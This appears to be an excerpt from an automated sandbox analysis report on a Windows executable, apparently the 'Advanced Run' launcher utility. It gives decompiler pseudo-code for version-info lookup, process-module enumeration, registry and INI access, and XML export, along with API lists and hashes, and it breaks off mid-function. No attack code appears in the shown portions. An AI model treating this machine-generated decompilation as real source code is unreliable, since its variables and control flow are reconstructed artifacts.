                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				int _v12;
                                                                                                                				short _v524;
                                                                                                                				char _v1036;
                                                                                                                				void* __edi;
                                                                                                                
                                                                                                                				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                				wcscat( &_v524, _a8);
                                                                                                                				wcscat( &_v524, "\\");
                                                                                                                				wcscat( &_v524, _a12);
                                                                                                                				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t34 =  &_v1036;
                                                                                                                				E00404923(0xff,  &_v1036, _v8);
                                                                                                                				E004049A2(_t34, __esi);
                                                                                                                				return 1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                				void* _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				void* _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t69;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				void _t89;
                                                                                                                				signed int _t90;
                                                                                                                				int _t98;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t109;
                                                                                                                
                                                                                                                				_t106 = _t105 & 0xfffffff8;
                                                                                                                				E0040B550(0x8874, __ecx);
                                                                                                                				_t98 = 0;
                                                                                                                				_a8 = 0;
                                                                                                                				if(E00404BD3() == 0) {
                                                                                                                					L12:
                                                                                                                					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t89 = _a4;
                                                                                                                						_t58 =  *0x40f83c(8, _t89);
                                                                                                                						__eflags = _t58 - 0xffffffff;
                                                                                                                						_v8 = _t58;
                                                                                                                						if(_t58 != 0xffffffff) {
                                                                                                                							_v0 = 1;
                                                                                                                							_a560 = 0x428;
                                                                                                                							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                							while(1) {
                                                                                                                								__eflags = _t59;
                                                                                                                								if(_t59 == 0) {
                                                                                                                									goto L18;
                                                                                                                								}
                                                                                                                								memset( &_a8, _t98, 0x21c);
                                                                                                                								_a12 = _a580;
                                                                                                                								_a8 = _t89;
                                                                                                                								wcscpy( &_a16,  &_a1096);
                                                                                                                								_a540 = _a576;
                                                                                                                								_t106 = _t106 + 0x14;
                                                                                                                								_a544 = _a572;
                                                                                                                								_a552 = 0x428;
                                                                                                                								_t69 = E00409510(_a8,  &_a8);
                                                                                                                								__eflags = _t69;
                                                                                                                								if(_t69 != 0) {
                                                                                                                									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t109 =  *0x4101bc - _t98; // 0x0
                                                                                                                					if(_t109 == 0) {
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                						_v0 = _t72;
                                                                                                                						if(_t72 != 0) {
                                                                                                                							_push( &_a4);
                                                                                                                							_push(0x8000);
                                                                                                                							_push( &_a2160);
                                                                                                                							_push(_t72);
                                                                                                                							if( *0x40f840() != 0) {
                                                                                                                								_t6 =  &_v12;
                                                                                                                								 *_t6 = _v12 >> 2;
                                                                                                                								_v8 = 1;
                                                                                                                								_t90 = 0;
                                                                                                                								if( *_t6 != 0) {
                                                                                                                									while(1) {
                                                                                                                										_a1616 = _t98;
                                                                                                                										memset( &_a1618, _t98, 0x208);
                                                                                                                										memset( &_a8, _t98, 0x21c);
                                                                                                                										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                										_t106 = _t106 + 0x18;
                                                                                                                										_a8 = _a4;
                                                                                                                										_a12 = _t78;
                                                                                                                										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                										E0040920A( &_v0,  &_a1600);
                                                                                                                										_push(0xc);
                                                                                                                										_push( &_v20);
                                                                                                                										_push(_v4);
                                                                                                                										_push(_v32);
                                                                                                                										if( *0x40f844() != 0) {
                                                                                                                											_a508 = _v32;
                                                                                                                											_a512 = _v36;
                                                                                                                										}
                                                                                                                										if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                											goto L18;
                                                                                                                										}
                                                                                                                										_t90 = _t90 + 1;
                                                                                                                										if(_t90 < _v44) {
                                                                                                                											_t98 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                										}
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L18:
                                                                                                                							CloseHandle(_v16);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _a8;
                                                                                                                			}


























                                                                                                                0x0040934e
                                                                                                                0x0040934f
                                                                                                                0x00409358
                                                                                                                0x0040935e
                                                                                                                0x0040935e
                                                                                                                0x00409363
                                                                                                                0x0040936b
                                                                                                                0x0040936d
                                                                                                                0x00409377
                                                                                                                0x00409385
                                                                                                                0x0040938d
                                                                                                                0x0040939d
                                                                                                                0x004093a5
                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040931c
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                                                
                                                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				signed short* _t34;
                                                                                                                				signed int _t37;
                                                                                                                				void* _t40;
                                                                                                                				signed short* _t44;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t40 = __edi;
                                                                                                                				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                				_t37 = 0;
                                                                                                                				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_v516 = _v516 & 0x00000000;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_t44 =  &_v516;
                                                                                                                						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                						_t34 = _t44;
                                                                                                                						_push(_t34);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_push(_t34);
                                                                                                                						_push(L"<%s>%s</%s>\r\n");
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t46 = _t46 + 0x24;
                                                                                                                						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						_t37 = _t37 + 1;
                                                                                                                					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void _v2062;
                                                                                                                				short _v2064;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_v2064 = _v2064 & _t16;
                                                                                                                					memset( &_v2062, _t16, 0x7fe);
                                                                                                                					_push(__edi + 0x20a);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2064);
                                                                                                                					L0040B1EC();
                                                                                                                					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                						_v8 = 1;
                                                                                                                						RegCloseKey(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                				signed short _v131076;
                                                                                                                
                                                                                                                				_t25 = __esi;
                                                                                                                				E0040B550(0x20000, __ecx);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                				} else {
                                                                                                                					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                						_push(_a24);
                                                                                                                					} else {
                                                                                                                						_v131076 = _v131076 & 0x00000000;
                                                                                                                						_push(__esi);
                                                                                                                						_push(L"\"%s\"");
                                                                                                                						_push(0xfffe);
                                                                                                                						_push( &_v131076);
                                                                                                                						L0040B1EC();
                                                                                                                						_push(_a24);
                                                                                                                						_push( &_v131076);
                                                                                                                					}
                                                                                                                					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				char _v2052;
                                                                                                                				short _v4100;
                                                                                                                				void* __edi;
                                                                                                                				long _t15;
                                                                                                                				long _t16;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				E0040B550(0x1000, __ecx);
                                                                                                                				_t16 = _t15;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_t16 = GetLastError();
                                                                                                                				}
                                                                                                                				E00404706(_t16,  &_v2052);
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(_t16);
                                                                                                                				_push(L"Error %d: %s");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v4100);
                                                                                                                				L0040B1EC();
                                                                                                                				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				signed short _t85;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				signed short _t93;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t128;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t138;
                                                                                                                				void* _t141;
                                                                                                                				void* _t142;
                                                                                                                				void* _t146;
                                                                                                                
                                                                                                                				_t142 = __eflags;
                                                                                                                				_push(_t102);
                                                                                                                				_t131 = __eax;
                                                                                                                				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                				E00406746(__eax);
                                                                                                                				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                				_t135 = 5;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                				_t124 = 0x14;
                                                                                                                				_t74 = _t135 * _t124;
                                                                                                                				 *(_t131 + 0x2d0) = _t135;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                				L0040B26C();
                                                                                                                				 *(_t131 + 0x2d4) = _t74;
                                                                                                                				_t126 = 0x14;
                                                                                                                				_t76 = _t135 * _t126;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                				L0040B26C();
                                                                                                                				_t95 = 0x40f008;
                                                                                                                				 *(_t131 + 0x40) = _t76;
                                                                                                                				_v8 = 0x40f008;
                                                                                                                				do {
                                                                                                                					_t137 =  *_t95 * 0x14;
                                                                                                                					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                					_t141 = _t141 + 0x18;
                                                                                                                					_v12 = _t85;
                                                                                                                					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                					if((_t85 & 0xffff0000) == 0) {
                                                                                                                						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                						_t95 = _v8;
                                                                                                                						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                					}
                                                                                                                					_t95 = _t95 + 0x28;
                                                                                                                					_t146 = _t95 - 0x40f0d0;
                                                                                                                					_v8 = _t95;
                                                                                                                				} while (_t146 < 0);
                                                                                                                				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                				_t138 = 5;
                                                                                                                				_t128 = 4;
                                                                                                                				_t87 = _t138 * _t128;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                				 *(_t131 + 0x2c) = _t138;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                				L0040B26C();
                                                                                                                				_push(0xc);
                                                                                                                				 *(_t131 + 0x30) = _t87;
                                                                                                                				L0040B26C();
